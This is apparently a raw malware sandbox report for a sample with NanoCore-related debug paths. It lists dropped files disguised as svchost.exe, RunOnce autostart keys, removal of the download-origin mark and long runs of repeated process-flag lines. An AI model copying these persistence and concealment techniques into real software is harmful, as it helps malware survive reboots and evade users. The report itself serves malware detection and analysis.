    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319523647.0000000000884000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000002.560950517.00000000014DC000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: svchost.exe, 0000000F.00000000.464074889.0000000006E1F000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\dll\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.319928127.00000000008B7000.00000004.00000020.sdmp, svchost.exe, 0000000F.00000000.441310771.0000000006E00000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbR source: p9Ts9VV2NZ.exe, 00000000.00000000.359350657.0000000006D40000.00000004.00000001.sdmp
    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb\??\C:\Windows\symbols\dll\System.pdba source: svchost.exe, 0000000F.00000000.441350705.0000000006E11000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.359399711.0000000006D61000.00000004.00000001.sdmp
    Source: Binary string: (PYi8C:\Windows\System.Core.pdb source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000000.391536550.0000000000567000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: C:\Users\Daan\source\repos\NanoExploit\ClientTest\obj\Debug\ClientTest.pdb source: p9Ts9VV2NZ.exe, 00000009.00000002.565058267.0000000004928000.00000004.00000001.sdmp
    Source: Binary string: svchost.PDB source: svchost.exe, 0000000F.00000000.422620669.0000000000DE7000.00000004.00000001.sdmp
    Source: Binary string: System.Core.pdbk source: p9Ts9VV2NZ.exe, 00000000.00000000.359399711.0000000006D61000.00000004.00000001.sdmp
    Source: Binary string: p9Ts9VV2NZ.PDB source: p9Ts9VV2NZ.exe, 00000000.00000000.317635734.0000000000577000.00000004.00000001.sdmp
    Source: p9Ts9VV2NZ.exeStatic PE information: 0xA999CAFB [Tue Mar 2 04:47:55 2060 UTC]

    Persistence and Installation Behavior:

    barindex
    Drops PE files with benign system namesShow sources
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile created: C:\Users\Public\Documents\???????????????\svchost.exeJump to dropped file
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile created: C:\Users\Public\Documents\???????????????\svchost.exeJump to dropped file

    Boot Survival:

    barindex
    Creates autostart registry keys with suspicious namesShow sources
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ???????????????Jump to behavior

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeFile opened: C:\Users\user\Desktop\p9Ts9VV2NZ.exe:Zone.Identifier read attributes | delete
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Users\user\Desktop\p9Ts9VV2NZ.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
